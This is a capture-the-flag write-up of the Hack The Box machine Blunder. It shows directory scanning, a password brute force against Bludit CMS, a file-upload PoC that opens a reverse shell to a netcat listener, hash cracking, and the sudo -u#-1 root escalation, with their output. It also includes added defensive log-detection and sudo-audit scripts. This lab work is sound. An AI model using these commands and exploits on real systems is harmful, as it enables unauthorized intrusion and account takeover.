Disclaimer

The hosts attacked in this article are legally authorized targets. The tools and methods used here are for learning and exchange only. Do not use the tools or the attack ideas in this article for any illegal purpose. I take no responsibility for any consequences, misuse or damage arising from it.

Service discovery

┌──(root💀kali)-[~/HTB/Blunder]
└─# nmap -sV -Pn 10.10.10.191 -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-21 01:34 EST
Nmap scan report for 10.10.10.191
Host is up (0.30s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http    Apache httpd 2.4.41 ((Ubuntu))

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.09 seconds

Port 21 is closed, so port 80 is the only way in. Let's brute-force its directories.

Directory brute-forcing

└─# python3 dirsearch.py -e * -t 100 -u http://10.10.10.191

  _|. _ _  _  _  _ _|_    v0.4.2
 (_||| _) (/_(_|| (_| )

Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 100 | Wordlist size: 15492

Output File: /root/dirsearch/reports/10.10.10.191/_21-12-21_01-37-07.txt

Error Log: /root/dirsearch/logs/errors-21-12-21_01-37-07.log

Target: http://10.10.10.191/

[01:37:09] Starting:
[01:37:21] 200 -    7KB - /%3f/
[01:37:25] 400 -  304B  - /.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:37:45] 200 -  955B  - /.github/
[01:37:46] 200 -  563B  - /.gitignore
[01:38:28] 200 -    7KB - /0
[01:38:55] 200 -    1KB - /LICENSE
[01:39:00] 200 -    3KB - /README.md
[01:39:59] 200 -    3KB - /about
[01:40:23] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/
[01:40:32] 200 -    2KB - /admin/
[01:43:38] 400 -  304B  - /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
[01:45:44] 200 -   30B  - /install.php
[01:48:07] 200 -   22B  - /robots.txt
[01:48:16] 403 -  277B  - /server-status/
[01:48:16] 403 -  277B  - /server-status
[01:49:19] 200 -  118B  - /todo.txt

I usually brute-force it a second time with gobuster.

└─# gobuster dir -w /usr/share/wordlists/web-content/common.txt -u http://10.10.10.191 -t 30 --no-error
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.191
[+] Method:                  GET
[+] Threads:                 30
[+] Wordlist:                /usr/share/wordlists/web-content/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/12/21 01:51:39 Starting gobuster in directory enumeration mode
===============================================================
/.htpasswd            (Status: 403) [Size: 277]
/.git/logs/           (Status: 301) [Size: 0] [--> http://10.10.10.191/.git/logs]
/.htaccess            (Status: 403) [Size: 277]
/.gitignore           (Status: 200) [Size: 563]
/.hta                 (Status: 403) [Size: 277]
/0                    (Status: 200) [Size: 7562]
/LICENSE              (Status: 200) [Size: 1083]
/about                (Status: 200) [Size: 3281]
/admin                (Status: 301) [Size: 0] [--> http://10.10.10.191/admin/]
/cgi-bin/             (Status: 301) [Size: 0] [--> http://10.10.10.191/cgi-bin]
/robots.txt           (Status: 200) [Size: 22]
/server-status        (Status: 403) [Size: 277]
===============================================================
2021/12/21 01:53:33 Finished
===============================================================

Combining the results of the two scans, we go through the files and directories of interest one by one.

README.md

[Bludit](https://www.bludit.com/)
================================

**Simple**, **Fast** and **Flexible** CMS.

Bludit is a web application to build your own **website** or **blog** in seconds, it's completely **free and open source**. Bludit uses files in JSON format to store the content, you don't need to install or configure a database. You only need a web server with PHP support.

Bludit is a **Flat-File** CMS.

Bludit supports **Markdown** and **HTML code** for the content.

- [Plugins](https://plugins.bludit.com)
- [Themes](https://themes.bludit.com)
- [Documentation](https://docs.bludit.com)
- Help and Support [Forum](https://forum.bludit.org) and [Chat](https://gitter.im/bludit/support)

This gives us the CMS name: Bludit.

todo.txt

- Update the CMS
- Turn off FTP - DONE
- Remove old users - DONE
- Inform fergus that the new blog needs images - PENDING

This confirms that FTP was turned off on purpose. The CMS update has not been done, which suggests a known, unpatched vulnerability, and fergus is probably a username.

Searching for exploit code for the CMS

┌──(root💀kali)-[~/HTB/Blunder]
└─# searchsploit Bludit
---------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                              |  Path
---------------------------------------------------------------------------- ---------------------------------
Bludit 3.9.2 - Authentication Bruteforce Mitigation Bypass                  | php/webapps/48746.rb
Bludit - Directory Traversal Image File Upload (Metasploit)                 | php/remote/47699.rb
Bludit 3.9.12 - Directory Traversal                                         | php/webapps/48568.py
Bludit 3.9.2 - Auth Bruteforce Bypass                                       | php/webapps/48942.py
Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)                | php/webapps/49037.rb
Bludit 3.9.2 - Directory Traversal                                          | multiple/webapps/48701.txt
Bludit Pages Editor 3.0.0 - Arbitrary File Upload                           | php/webapps/46060.txt
---------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

There is an authentication brute-force bypass. Copy 48942.py locally and save the username fergus in user.txt.

┌──(root💀kali)-[~/HTB/Blunder]
└─# python3 48942.py -l http://10.10.10.191/admin/login.php -u ./user.txt -p /usr/share/wordlists/SecLists/Passwords/2020-200_most_used_passwords.txt

[*] Bludit Auth BF Mitigation Bypass Script by ColdFusionX

[/] Brute Force: Testing -> fergus:123456
[/] Brute Force: Testing -> fergus:123456789
[/] Brute Force: Testing -> fergus:picture1
[/] Brute Force: Testing -> fergus:password
[/] Brute Force: Testing -> fergus:12345678
[/] Brute Force: Testing -> fergus:111111
[/] Brute Force: Testing -> fergus:123123
[/] Brute Force: Testing -> fergus:12345
[/] Brute Force: Testing -> fergus:1234567890
[/] Brute Force: Testing -> fergus:1234567
[/] Brute Force: Testing -> fergus:qwerty
[/] Brute Force: Testing -> fergus:abc123
[/] Brute Force: Testing -> fergus:Million2
[/] Brute Force: Testing -> fergus:000000
[/] Brute Force: Testing -> fergus:1234
[/] Brute Force: Testing -> fergus:iloveyou
[/] Brute Force: Testing -> fergus:aaron431
[/] Brute Force: Testing -> fergus:password1
[/] Brute Force: Testing -> fergus:qqww1122
[/] Brute Force: Testing -> fergus:123
[/] Brute Force: Testing -> fergus:omgpop
[/] Brute Force: Testing -> fergus:123321
[/] Brute Force: Testing -> fergus:654321
[/] Brute Force: Testing -> fergus:qwertyuiop
[/] Brute Force: Testing -> fergus:qwer123456
[/] Brute Force: Testing -> fergus:123456a
[/] Brute Force: Testing -> fergus:a123456
[/] Brute Force: Testing -> fergus:666666
[/] Brute Force: Testing -> fergus:asdfghjkl
[/] Brute Force: Testing -> fergus:ashley
[/] Brute Force: Testing -> fergus:987654321
[/] Brute Force: Testing -> fergus:RolandDeschain

[*] SUCCESS!!
[+] Use Credential -> fergus:RolandDeschain

We now have CMS login credentials: fergus:RolandDeschain

Initial shell

The CMS also has a file upload vulnerability, but the exploit shipped with Kali requires Metasploit, which we don't want to use.

CVE-2019-16113 is the vulnerability the Metasploit module exploits. A standalone PoC for it is available on GitHub.

Following the PoC's usage instructions, first save RolandDeschain in a file named pass.

Start a listener

nc -lnvp 4242

Run the PoC

┌──(root💀kali)-[~/HTB/Blunder]
└─# python3 poc.py

This exploit combines CVE-2019-17240 & CVE-2019-16113 to gain remote shell on target.
Created by: Kisho64 (@h_A_M_i__)

Enter target URL (i.e. https://target.com): http://10.10.10.191
[~] Enter Listener's IP address: 10.10.14.3
[~] Enter listener's port: 4242
[...] Checking if the target is live...
[ + ] The target is live! We are good to go...
[ ~ ] Should I bruteforce username? [Y/N]: N
[ ~ ] What username should I use? (leave this to use admin as username): fergus
[ ~ ] Enter the location for password list: /root/htb/Blunder/pass
[ * ] Tried: RolandDeschain
[ + ] Creds found: fergus:RolandDeschain
[...] Attempting to login now...
[ + ] Login succeed... We are good to go :)
[ + ] The payload mYTcGvAwRD.php has been uploaded...
[ + ] The payload .htaccess has been uploaded...
[...] Attempting to get a shell... @ http://10.10.10.191/bl-content/tmp/mYTcGvAwRD.php
[+] You should be getting a shell by now, If not open http://10.10.10.191/bl-content/tmp/mYTcGvAwRD.php

We get the initial shell

┌──(root💀kali)-[~/HTB/Blunder]
└─# nc -lnvp 4242
listening on [any] 4242 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.191] 46044
bash: cannot set terminal process group (1279): Inappropriate ioctl for device
bash: no job control in this shell
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@blunder:/var/www/bludit-3.9.2/bl-content/tmp$
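Everything done against the web server so far (the two directory scans, the login brute force, and the fetch of the uploaded PHP file from bl-content/tmp) leaves a recognisable trace in the Apache access log. The script below is an added example, not code from this write-up, from Bludit or from the box, that flags those three patterns over constructed sample log lines. The thresholds, the 60-second window and the wordlist-entry paths are assumptions.

```python
"""Flag the web-side attack chain from this write-up in Apache access logs.

Added example (not part of the write-up or of Bludit). It looks for
(1) directory enumeration: a burst of 403/404 responses from one client,
(2) login brute force: a burst of POSTs to /admin/login.php from one client,
(3) a request for a .php file under /bl-content/tmp/, where the upload PoC
    placed its payload.
The log lines, thresholds and window size are constructed assumptions.
"""
import re
from collections import defaultdict
from datetime import datetime

# Apache common/combined log prefix: ip ident user [ts] "METHOD path proto" status size
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def max_in_window(recs, window_s):
    """Largest number of time-sorted records that fall inside any window_s-second span."""
    best, start = 0, 0
    for end in range(len(recs)):
        while (recs[end]["ts"] - recs[start]["ts"]).total_seconds() > window_s:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyse(lines, window_s=60, enum_threshold=20, login_threshold=10):
    """Return {client_ip: [finding, ...]} for clients that trip at least one rule."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec:
            per_ip[rec["ip"]].append(rec)

    findings = {}
    for ip, recs in per_ip.items():
        recs.sort(key=lambda r: r["ts"])
        hits = []
        misses = [r for r in recs if r["status"] in (403, 404)]
        if max_in_window(misses, window_s) >= enum_threshold:
            hits.append("directory enumeration")
        logins = [r for r in recs if r["method"] == "POST" and r["path"].startswith("/admin/login")]
        if max_in_window(logins, window_s) >= login_threshold:
            hits.append("login brute force")
        if any(r["path"].startswith("/bl-content/tmp/") and r["path"].endswith(".php") for r in recs):
            hits.append("php file requested from bl-content/tmp")
        if hits:
            findings[ip] = hits
    return findings


def sample_log():
    """Constructed sample: one scanning client and one ordinary visitor."""
    attacker = '10.10.14.3 - - [21/Dec/2021:01:37:{:02d} -0500] "{} {} HTTP/1.1" {} 277'
    lines = [attacker.format(i, "GET", f"/wordlist-entry-{i}", 404) for i in range(25)]
    lines += [attacker.format(30 + i, "POST", "/admin/login.php", 200) for i in range(12)]
    lines.append(attacker.format(50, "GET", "/bl-content/tmp/mYTcGvAwRD.php", 200))
    visitor = '192.0.2.10 - - [21/Dec/2021:01:40:{:02d} -0500] "GET {} HTTP/1.1" 200 3281'
    lines += [visitor.format(i, p) for i, p in enumerate(["/", "/about", "/robots.txt"])]
    return lines


if __name__ == "__main__":
    for ip, hits in analyse(sample_log()).items():
        print(ip, "->", ", ".join(hits))
```

The sliding window counts bursts rather than totals, so a slow visitor who hits a few dead links over a day does not trip the enumeration rule, while a wordlist scan does within seconds. The third rule is the cheapest and most specific one for this CMS: Bludit serves uploads from bl-content, and a request for a .php file under its tmp directory has no legitimate reason to succeed.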

Escalating to hugo

user.txt belongs to the hugo user, and we do not have permission to read it.

In the file /var/www/bludit-3.10.0a/bl-content/databases/users.php we find hugo's password hash: faca404fd5c0a31cf1897b823c695c85cffeb98d (40 hex characters, i.e. SHA-1 length rather than MD5)

www-data@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ cat /var/www/bludit-3.10.0a/bl-content/databases/users.php
<?php defined('BLUDIT') or die('Bludit CMS.'); ?>
{
    "admin": {
        "nickname": "Hugo",
        "firstName": "Hugo",
        "lastName": "",
        "role": "User",
        "password": "faca404fd5c0a31cf1897b823c695c85cffeb98d",
        "email": "",
        "registered": "2019-11-27 07:40:55",
        "tokenRemember": "",
        "tokenAuth": "b380cb62057e9da47afce66b4615107d",
        "tokenAuthTTL": "2009-03-15 14:00",
        "twitter": "",
        "facebook": "",
        "instagram": "",
        "codepen": "",
        "linkedin": "",
        "github": "",
        "gitlab": ""
    }
}

The hash cracks to Password120.

Switch to hugo's account:

www-data@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ su hugo
su hugo
Password: Password120
id
uid=1001(hugo) gid=1001(hugo) groups=1001(hugo)
whoami
hugo

Privilege escalation

Check hugo's sudo privileges

hugo@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ sudo -l
sudo -l
Password: Password120
Matching Defaults entries for hugo on blunder:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User hugo may run the following commands on blunder:
    (ALL, !root) /bin/bash

This rule lets us escalate directly to root. sudo versions before 1.8.28 accept -u#-1 and resolve it to uid 0, so the !root exclusion does not hold; the fix on the defending side is to upgrade sudo and to replace the negation with an explicit list of permitted run-as users.

hugo@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers$ sudo -u#-1 /bin/bash
root@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers# id
id
uid=0(root) gid=1001(hugo) groups=1001(hugo)
root@blunder:/var/www/bludit-3.9.2/bl-kernel/admin/controllers# whoami
whoami
root
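The sudo rule above is the kind of thing a host audit should catch before anyone has to exploit it. The script below is an added example, not from this write-up, from sudo or from the box: it scans sudo -l style rule lines for run-as lists of the form (ALL, !someone) and compares the installed sudo version against 1.8.28, the first release in which the uid -1 trick no longer works. The rule lines and version strings are constructed samples; on a real host feed it the output of sudo -l and sudo -V.

```python
"""Audit sudo rules for the runas-negation pattern shown in the write-up.

Added example, not from the write-up, from sudo or from the box. A rule such
as "(ALL, !root) /bin/bash" relies on sudo honouring the "!root" exclusion,
which sudo versions before 1.8.28 fail to do for "-u#-1"; the audit therefore
reports both the rule and whether the installed version is old enough to
matter. The rule lines and version strings are constructed samples.
"""
import re

# First sudo release that rejects the uid -1 trick.
SAFE_VERSION = (1, 8, 28)
# "(runas-list) [TAG:] command", the shape in which sudo -l prints rules.
RUNAS_RE = re.compile(r"\(\s*(?P<runas>[^)]*)\)\s*(?P<cmd>\S.*)")


def parse_version(version_line):
    """'Sudo version 1.8.25p1' -> (1, 8, 25); the patch suffix is ignored."""
    m = re.search(r"(\d+)\.(\d+)\.(\d+)", version_line)
    if not m:
        raise ValueError(f"no version number in {version_line!r}")
    return tuple(int(x) for x in m.groups())


def negated_runas_rules(rule_lines):
    """Return (rule, command) pairs whose runas list is ALL minus some users."""
    hits = []
    for raw in rule_lines:
        line = raw.strip()
        m = RUNAS_RE.search(line)
        if not m:
            continue
        runas = [u.strip() for u in m.group("runas").split(",")]
        if "ALL" in runas and any(u.startswith("!") for u in runas):
            hits.append((line, m.group("cmd").strip()))
    return hits


def audit(version_line, rule_lines):
    """Combine the version check and the rule scan into one report."""
    version = parse_version(version_line)
    rules = negated_runas_rules(rule_lines)
    advice = []
    if rules:
        advice.append("replace ALL-minus-user runas lists with an explicit list of permitted users")
    if rules and version < SAFE_VERSION:
        advice.append("upgrade sudo to 1.8.28 or later; until then these rules are equivalent to (ALL)")
    return {
        "sudo_version": version,
        "version_vulnerable": version < SAFE_VERSION,
        "negated_runas_rules": rules,
        "advice": advice,
    }


# Constructed sample in the shape of "sudo -l" output (the last rule is made up).
SAMPLE_SUDO_L = [
    "Matching Defaults entries for hugo on blunder:",
    "    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "User hugo may run the following commands on blunder:",
    "    (ALL, !root) /bin/bash",
    "    (www-data) NOPASSWD: /usr/bin/systemctl restart apache2",
]

if __name__ == "__main__":
    # Constructed version strings, one on each side of the fix.
    for v in ("Sudo version 1.8.25p1", "Sudo version 1.9.5p2"):
        print(v, audit(v, SAMPLE_SUDO_L))
```

Even on a patched sudo the rule is still reported, because (ALL, !root) grants more than it appears to: hugo could run /bin/bash as www-data or as any other service account, so the intended "anyone but root" policy is rarely what an administrator actually wants.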